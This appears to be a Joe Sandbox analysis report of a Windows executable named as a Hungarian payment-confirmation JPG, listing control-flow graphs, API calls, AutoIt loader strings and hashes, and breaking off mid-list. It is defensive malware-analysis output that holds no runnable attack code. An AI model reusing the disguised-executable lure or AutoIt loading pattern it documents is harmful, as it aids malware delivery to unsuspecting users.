                                                                                                          control_flow_graph 1230 452ac7-452b53 call 422240 call 442c5a call 4150d1 call 41313c 1239 452c30-452c3a call 452719 1230->1239 1240 452b59-452b6a call 452719 1230->1240 1244 452c3f-452c41 1239->1244 1245 452b6c-452b77 1240->1245 1246 452b7a-452c2e call 413a0e call 411567 call 411536 call 413a0e call 411536 * 2 1240->1246 1244->1245 1247 452c47-452d18 call 414d04 * 8 call 431e1f call 4149c2 1244->1247 1246->1247 1280 452d28-452d43 call 442bb4 1247->1280 1281 452d1a-452d25 1247->1281 1284 452de2-452df7 call 414a46 1280->1284 1285 452d49 1280->1285 1292 452e15-452e1a 1284->1292 1293 452df9-452e12 DeleteFileW 1284->1293 1287 452d51-452d59 1285->1287 1289 452d5f 1287->1289 1290 452d5b-452d5d 1287->1290 1291 452d64-452d86 call 414d04 1289->1291 1290->1291 1302 452da9-452dcc call 432229 call 4142b6 1291->1302 1303 452d88-452da7 call 442c29 1291->1303 1294 452ea6-452ebb CopyFileW 1292->1294 1295 452e20-452e81 call 431e9e call 431e71 call 44b1a9 1292->1295 1299 452ebd-452ed6 DeleteFileW 1294->1299 1300 452ed9-452ef5 DeleteFileW call 431ddb 1294->1300 1314 452e86-452e88 1295->1314 1308 452efa-452f02 1300->1308 1315 452dd1-452ddc 1302->1315 1303->1302 1314->1300 1316 452e8a-452ea3 DeleteFileW 1314->1316 1315->1284 1317 452d4b-452d4d 1315->1317 1317->1287
                                                                                                          APIs
                                                                                                            • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                          • _fseek.LIBCMT ref: 00452B3B
                                                                                                          • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                          • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                          • _wcscat.LIBCMT ref: 00452BC5
                                                                                                          • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                          • _wcscat.LIBCMT ref: 00452C07
                                                                                                          • _wcscat.LIBCMT ref: 00452C1C
                                                                                                          • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                          • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                          • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                          • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                          • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                          • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                          • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                          • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                          • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                          • String ID:
                                                                                                          • API String ID: 2054058615-0
                                                                                                          • Opcode ID: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                                                                                          • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                          • Opcode Fuzzy Hash: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                                                                                          • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1318 46e1a6-46e1ba 1319 46e1c0-46e1cd call 40c650 1318->1319 1320 46e45e 1318->1320 1319->1320 1326 46e1d3-46e1d7 1319->1326 1321 46e462-46e47d call 4533eb call 445ae0 1320->1321 1329 46e483-46e48a 1321->1329 1330 46e1dc-46e1e3 1321->1330 1326->1321 1331 46e2e7-46e2fa call 40f760 1330->1331 1332 46e1e9-46e214 call 45340c call 411567 call 413e1f 1330->1332 1338 46e2fc-46e30b call 403cd0 1331->1338 1339 46e30d-46e343 call 45340c call 413a0e 1331->1339 1350 46e216-46e255 call 411567 call 411536 call 45340c call 411536 1332->1350 1351 46e258-46e282 call 45340c call 411567 call 433998 1332->1351 1347 46e2c8-46e2e4 call 408f40 1338->1347 1356 46e374-46e3fa call 411567 call 411536 * 3 call 45340c call 433784 call 4339fa 1339->1356 1357 46e345-46e34d 1339->1357 1350->1351 1378 46e284-46e29c call 4111c1 1351->1378 1379 46e29e-46e2c2 call 45340c call 44bd27 1351->1379 1397 46e403-46e405 1356->1397 1398 46e3fc-46e3ff 1356->1398 1357->1356 1361 46e34f-46e371 call 411567 * 2 1357->1361 1361->1356 1378->1347 1378->1379 1379->1329 1379->1347 1399 46e407-46e41e call 45340c call 452ac7 1397->1399 1401 46e436-46e444 call 408f40 1397->1401 1398->1399 1400 46e401 1398->1400 1409 46e423-46e425 1399->1409 1400->1401 1406 46e44b-46e45b call 431e58 1401->1406 1409->1406 1411 46e427-46e431 call 403cd0 1409->1411 1411->1401
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                          • API String ID: 0-1896584978
                                                                                                          • Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                                                          • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                          • Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                                                          • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,00000104,?), ref: 00401F4C
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • __wcsicoll.LIBCMT ref: 00402007
                                                                                                          • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                          • __wcsicoll.LIBCMT ref: 00402033
                                                                                                            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                          • __wcsicoll.LIBCMT ref: 00402049
                                                                                                          • _wcscpy.LIBCMT ref: 0040207C
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,00000104), ref: 00428B5B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe$CMDLINE$CMDLINERAW
                                                                                                          • API String ID: 3948761352-1458772795
                                                                                                          • Opcode ID: c7db578a58d049c9f477fac5dc1f618de62341779cf4fb077178cc74bd876c41
                                                                                                          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                          • Opcode Fuzzy Hash: c7db578a58d049c9f477fac5dc1f618de62341779cf4fb077178cc74bd876c41
                                                                                                          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                          • String ID: D)E$D)E$FILE
                                                                                                          • API String ID: 3888824918-361185794
                                                                                                          • Opcode ID: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                                                                                          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                          • Opcode Fuzzy Hash: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                                                                                          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                          • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • _wcsncat.LIBCMT ref: 0040E433
                                                                                                          • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          • _wcscpy.LIBCMT ref: 0040E487
                                                                                                            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                          • _wcscat.LIBCMT ref: 00427541
                                                                                                          • _wcslen.LIBCMT ref: 00427551
                                                                                                          • _wcslen.LIBCMT ref: 00427562
                                                                                                          • _wcscat.LIBCMT ref: 0042757C
                                                                                                          • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                          • String ID: Include$\
                                                                                                          • API String ID: 3173733714-3429789819
                                                                                                          • Opcode ID: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                                                                                          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                          • Opcode Fuzzy Hash: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                                                                                          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • _fseek.LIBCMT ref: 0045292B
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                          • __fread_nolock.LIBCMT ref: 00452961
                                                                                                          • __fread_nolock.LIBCMT ref: 00452971
                                                                                                          • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                          • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                          • _fseek.LIBCMT ref: 004529BF
                                                                                                          • _malloc.LIBCMT ref: 004529CA
                                                                                                          • _malloc.LIBCMT ref: 004529D6
                                                                                                          • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                          • _free.LIBCMT ref: 00452A17
                                                                                                          • _free.LIBCMT ref: 00452A20
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1255752989-0
                                                                                                          • Opcode ID: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                                                                                          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                          • Opcode Fuzzy Hash: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                                                                                          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                          • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(00AC59A8,000000FF,00000000), ref: 00410552
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                          • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                          • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                          • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                          • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                            • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                            • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AC59A8,000000FF,00000000), ref: 00410552
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                          • API String ID: 423443420-4155596026
                                                                                                          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID: Default
                                                                                                          • API String ID: 1579825452-753088835
                                                                                                          • Opcode ID: 52280e62c68f30ae585b8c692c478d417b44ff92b6feebed6a1ade32e4dbe530
                                                                                                          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                          • Opcode Fuzzy Hash: 52280e62c68f30ae585b8c692c478d417b44ff92b6feebed6a1ade32e4dbe530
                                                                                                          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2137 40f5c0-40f5cf call 422240 2140 40f5d0-40f5e8 2137->2140 2140->2140 2141 40f5ea-40f613 call 413650 call 410e60 2140->2141 2146 40f614-40f633 call 414d04 2141->2146 2149 40f691 2146->2149 2150 40f635-40f63c 2146->2150 2153 40f696-40f69c 2149->2153 2151 40f660-40f674 call 4150d1 2150->2151 2152 40f63e 2150->2152 2157 40f679-40f67c 2151->2157 2154 40f640 2152->2154 2156 40f642-40f650 2154->2156 2158 40f652-40f655 2156->2158 2159 40f67e-40f68c 2156->2159 2157->2146 2160 40f65b-40f65e 2158->2160 2161 425d1e-425d3e call 4150d1 call 414d04 2158->2161 2162 40f68e-40f68f 2159->2162 2163 40f69f-40f6ad 2159->2163 2160->2151 2160->2154 2174 425d43-425d5f call 414d30 2161->2174 2162->2158 2165 40f6b4-40f6c2 2163->2165 2166 40f6af-40f6b2 2163->2166 2168 425d16 2165->2168 2169 40f6c8-40f6d6 2165->2169 2166->2158 2168->2161 2170 425d05-425d0b 2169->2170 2171 40f6dc-40f6df 2169->2171 2170->2156 2173 425d11 2170->2173 2171->2158 2173->2168 2174->2153
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
